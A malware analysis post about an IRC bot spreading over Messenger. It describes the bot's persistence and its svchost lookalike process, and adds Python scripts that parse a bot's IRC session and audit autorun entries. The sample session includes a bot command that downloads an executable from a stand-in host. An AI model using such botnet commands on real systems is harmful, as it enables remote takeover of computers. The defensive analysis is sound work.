Do you get mad if I post this photo of yours on my facebook?: Messenger bots

Yesterday we received a notification that a link to a malicious executable was spreading through Messenger. The malware contacts a remote server and, following the commands it receives from there, lets an attacker take control of the infected computer.

The downloaded sample was l7fa7bjnoon-77be2268ce.exe which, at the time of this analysis, was already detected as a threat by the following antivirus engines:

Its signatures are these:

During execution, the sample copied itself under the name scheb.exe to the path:

C:\Documents and Settings\<user>\Program Data\.

It also started a process with the same name, which established a connection to the IRC server 50.X.X.10 on port 6667.

It also modified the Windows registry so that it is executed at every system startup.

By analysing the network traffic generated by the bot, the data it uses to connect to the server were obtained.
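How an analyst extracts that connection data from a capture, as an added example that is not part of the original analysis: the script below parses a constructed IRC session (the nick, channel, key and operator commands are placeholders invented for the example; the post does not reproduce the bot's actual traffic) and also flags a TCP flow as an IRC login when it goes to port 6667 and the client sent both NICK and USER.

```python
"""Pull a bot's IRC connection data out of a captured session.

Added example, not part of the original analysis. SAMPLE_SESSION is a
constructed transcript in the style of an IRC bot logging in to its C&C
server on TCP port 6667; nick, channel, key and commands are placeholders.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

IRC_PORT = 6667

# Constructed sample. "C:" marks client->server lines, "S:" server->client.
SAMPLE_SESSION = """\
C: NICK [USA|XP|00]abc123
C: USER abc123 0 * :abc123
S: :irc.example.invalid 001 [USA|XP|00]abc123 :Welcome
C: JOIN #botchan s3cretkey
S: :master!op@example.invalid PRIVMSG #botchan :!dl http://example.invalid/u.exe
S: :master!op@example.invalid PRIVMSG #botchan :!msg Do you get mad if I post this photo of yours?
"""

# Optional RFC 1459 prefix: ":nick!user@host " or ":servername "
_PREFIX = re.compile(r"^:(?P<nick>[^!\s]+)(?:!(?P<user>[^@\s]+)@(?P<host>\S+))?\s+")


@dataclass
class IrcSummary:
    nick: Optional[str] = None
    user: Optional[str] = None
    channels: Dict[str, Optional[str]] = field(default_factory=dict)  # channel -> key
    commands: List[Tuple[Optional[str], str, str]] = field(default_factory=list)  # (sender, target, text)


def parse_irc_message(raw: str) -> Tuple[Optional[str], str, List[str]]:
    """Split one IRC line into (sender, COMMAND, params); the ':'-trailing param may contain spaces."""
    sender = None
    m = _PREFIX.match(raw)
    if m:
        sender = m.group("nick")
        raw = raw[m.end():]
    if " :" in raw:
        head, trailing = raw.split(" :", 1)
        params = head.split() + [trailing]
    else:
        params = raw.split()
    return sender, params[0].upper(), params[1:]


def parse_irc_session(text: str) -> IrcSummary:
    """Collect the nick/ident the bot registers with, the channels (and keys) it
    joins, and the operator commands it receives as channel messages."""
    summary = IrcSummary()
    for line in text.splitlines():
        if not line.strip():
            continue
        direction, raw = line.split(" ", 1)
        sender, command, params = parse_irc_message(raw)
        if direction == "C:":
            if command == "NICK" and params:
                summary.nick = params[0]
            elif command == "USER" and params:
                summary.user = params[0]
            elif command == "JOIN" and params:
                keys = params[1].split(",") if len(params) > 1 else []
                for i, chan in enumerate(params[0].split(",")):
                    summary.channels[chan] = keys[i] if i < len(keys) else None
        elif command == "PRIVMSG" and len(params) >= 2 and params[1].startswith("!"):
            # The "!" command prefix is a common bot convention; assumed for this sample.
            summary.commands.append((sender, params[0], params[1]))
    return summary


def looks_like_irc_login(dst_port: int, client_lines: List[str]) -> bool:
    """Flag a flow as an IRC login: destination port 6667 and the client sent both NICK and USER."""
    commands = {parse_irc_message(l)[1] for l in client_lines if l.strip()}
    return dst_port == IRC_PORT and {"NICK", "USER"} <= commands


if __name__ == "__main__":
    s = parse_irc_session(SAMPLE_SESSION)
    print("nick:", s.nick, "ident:", s.user, "channels:", s.channels)
    for sender, target, text in s.commands:
        print(f"command from {sender} in {target}: {text}")
```

The nick and channel key are what you need to join the channel yourself and watch the operator's commands; the port-plus-NICK/USER heuristic is what an IDS rule for IRC bots reduces to, so it is worth running over all flows, not only those to 6667.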

The bot also updated itself automatically, replacing itself with a new executable, bzhmer.com52eac7da1d.exe.

The propagation message was updated as well; after the update, the malicious executable displayed the fake message.

When bzhmer.com52eac7da1d.exe ran, it created a process named svchots.exe. As can be seen, the name is very close to that of the system process svchost.exe; with this, the malware author tries to confuse the user into believing it is a legitimate process.

This new process also connected to the IRC server 50.X.X.10 on port 6667.

A new registry key bearing the name of the fake process was created.
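Two of the indicators in this analysis, the copy dropped under the user profile and the svchots.exe/svchost.exe lookalike, can be checked mechanically. The script below is an added example, not part of the original post or of the malware: it parses a constructed registry export (the HKCU Run key, the value names and the paths are assumptions, since the post does not show which key was used) and flags autorun entries that point into user-writable directories or whose file name is one edit away from a Windows system binary.

```python
"""Audit Windows autorun entries for the two tricks seen in this analysis:
a copy dropped under the user profile, and a process name that imitates a
Windows binary (svchots.exe vs svchost.exe).

Added example, not part of the original write-up. SAMPLE_REG_EXPORT is a
constructed .reg export; the HKCU Run key, value names and paths are
assumptions, not something the post shows.
"""
import re
from typing import List, Optional, Tuple

# Constructed sample: what "reg export" of the Run key might produce on the infected XP box.
SAMPLE_REG_EXPORT = r"""
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"scheb"="C:\\Documents and Settings\\user\\Program Data\\scheb.exe"
"svchots"="C:\\Documents and Settings\\user\\Program Data\\svchots.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"""

# Legitimate Windows process names that malware likes to imitate.
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe",
                   "winlogon.exe", "services.exe", "smss.exe", "ctfmon.exe"}

# Directories a standard user can write to; an autorun pointing here deserves a look.
USER_WRITABLE = ("\\documents and settings\\", "\\users\\", "\\temp\\", "\\appdata\\")

_KEY = re.compile(r"^\[(?P<key>[^\]]+)\]$")
_VALUE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')


def parse_reg_export(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value name, data) triples from a .reg export, collapsing doubled backslashes."""
    entries, key = [], None
    for line in text.splitlines():
        line = line.strip()
        m = _KEY.match(line)
        if m:
            key = m.group("key")
            continue
        m = _VALUE.match(line)
        if m and key:
            entries.append((key, m.group("name"), m.group("data").replace("\\\\", "\\")))
    return entries


def edit_distance(a: str, b: str) -> int:
    """Optimal-string-alignment distance: insert/delete/substitute plus adjacent
    transposition, so svchots.exe vs svchost.exe scores 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def lookalike_of(name: str, max_distance: int = 1) -> Optional[str]:
    """Return the system binary `name` imitates, or None if it is exact or unrelated."""
    name = name.lower()
    if name in SYSTEM_BINARIES:
        return None
    best = min(SYSTEM_BINARIES, key=lambda c: edit_distance(name, c))
    return best if edit_distance(name, best) <= max_distance else None


def audit_autoruns(reg_text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (value name, path, reasons) for each Run/RunOnce entry that is suspicious."""
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if "\\currentversion\\run" not in key.lower():
            continue
        path = data.strip('"')
        exe = path.rsplit("\\", 1)[-1]
        reasons = []
        if any(marker in path.lower() for marker in USER_WRITABLE):
            reasons.append("user-writable path")
        target = lookalike_of(exe)
        if target:
            reasons.append(f"imitates {target}")
        if reasons:
            findings.append((name, path, reasons))
    return findings


if __name__ == "__main__":
    for name, path, reasons in audit_autoruns(SAMPLE_REG_EXPORT):
        print(f"{name}: {path} -> {', '.join(reasons)}")
```

The edit-distance check is deliberately loose (one insertion, deletion, substitution or swapped pair), which is exactly the space of names a human glancing at Task Manager will misread; an exact match against the system list is treated as clean, so a real svchost.exe started from the wrong directory is caught by the path rule instead.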

As has been reported before, spreading malware through Messenger with a message that invokes the name of a popular social network has become one of the most successful attack vectors used by cybercriminals. The best thing to do when we receive this kind of message from a contact is to close the window and let the contact know that their computer is very likely infected.


Messages of this kind are, and will remain, very common and, as usual, the best way to defend ourselves against them is to stay informed.